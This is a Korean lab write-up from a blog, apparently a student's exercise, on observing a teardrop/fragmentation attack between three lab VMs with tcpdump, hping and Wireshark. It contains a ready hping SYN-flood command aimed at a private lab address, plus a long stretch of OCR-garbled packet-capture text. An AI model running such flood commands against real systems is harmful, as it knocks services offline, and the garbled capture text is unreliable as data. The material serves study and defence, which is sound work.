2020. 7. 14.

[Network] tear drop 시퀀스 확인


    1. 구성과 계획
    • 네트워크 구성도
    피해자 att7 - 192.168.10.150/00:0c:29:a1:3f:e0
    감시자 att6 - 192.168.10.149/00:0C:29:C6:9A:42
    공격자 att5 - 192.168.10.148/00:0C:29:5D:87:05

    • 과정 정리
    step1. att6 tcpdump 캡쳐
    step2. att5 hping 공격 실행
    step3. wireshark 캡쳐본 분석

    1. 관련내용정리
    teardrop : 단순히 시퀀스 넘버를 일정하게 바꾸는것을 넘어 중첩과 빈공간을 만들며, 시퀀스 넘버를 복잡하게 섞는다.

    1. 실습과정
    step1. att6 tcpdump 캡쳐
    tcpdump -xX -w teardrop.cap
    step2. att5 hping 공격 실행ll
    hping -S 192.168.10.150 -d 50000 --flood -M 111
    step3. wireshark 캡쳐본 분석
    wireshark on
    • filtering : ip.addr == 192.168.10.150
    192. 168. 18.148 
192. 168. 18. 158 
192. 168.18.148 
192. 168.18. 158 
192. 168. 18.148 
192. 168. 18. 158 
192. 168.18.148 
192. 168.18. 158 
192. 168. 18.148 
192. 168. 18. 158 
192. 168.18.148 
192. 168.18. 158 
192. 168. 18.148 
192. 168. 18. 158 
192. 168.18.148 
192. 168.18. 158 
192. 168. 18. 148 
192. 168. 18. 158 
IPv4 
IPv4 
IPv4 
IPv4 
IPv4 
IPv4 
IPv4 
IPv4 
IPv4 
1514 
1514 
1514 
1514 
1514 
1514 
1514 
1514 
1214 
Fragmented 
Fragmented 
Fragmented 
Fragmented 
Fragmented 
Fragmented 
Fragmented 
Fragmented 
Fragmented 
IP 
IP 
IP 
IP 
IP 
IP 
IP 
IP 
IP 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
protocol 
( proto 
(proto 
(proto 
(proto 
(proto 
(proto 
(proto 
(proto 
(proto 
-TCP 
6, 
-TCP 6, 
-TCP 
6, 
-TCP 
6, 
-TCP 
6, 
-TCP 6, 
-TCP 
6, 
-TCP 6, 
-TCP 
6, 
off=37888, 
0++=38488, 
0++=39968, 
off 
0++=42928, 
0++=44488, 
0++=45888, 
0++=47368, 
0++=48848, 
10=8845) 
10=8845) 
10=8845) 
10=8845) 
10=8845) 
10=8845) 
10=8845) 
10=8845) 
10=8845) 
[Reassemble... 
[Reassemble... 
[Reassemble... 
[Reassemble... 
[Reassemble... 
[Reassemble... 
[Reassemble... 
[Reassemble... 
[Reassemble...
    id 모두 0045이다. 잘못된 패킷이라 판단되어 흰색으로 잘못된 패킷으로 표시되있다. 많이 오래된 OS라면 이렇게 버려지지않고 시스템자원이 계산하기 때문에 다운될 확률이 높다.
    Sequence number (raw) 
[Next sequence number: 
Acknowledgment number: 
Acknowledgment number 
59 fd 
111 
5ØØØ1 (relative 
227828048 
(raw): 227828048 
sequence number)] 
0181 
Header Length: 20 bytes 
Window size value: 512 
[Calculated window size: 512] 
Checksum: Øx1753 
[Checksum 
[unverified] 
Unverified] 
010 
17 
53 
Status : 
58 
58 
58 
58 
58 
94 
58 
61 
58 
(5) 
50 
58 
58 
50 02 02 
58 
58 
58 
.s 
app 
xxxxxxxx
    설정해놓은 시퀀스 넘버 111 중복되어 전송되었다.

    1. 결론
    현재의 OS 자동으로 차단하여 현재는 보기 힘든 공격이다.
    시퀀스넘버와 ID 확인하여 필터링 가능하다.


댓글 없음:

댓글 쓰기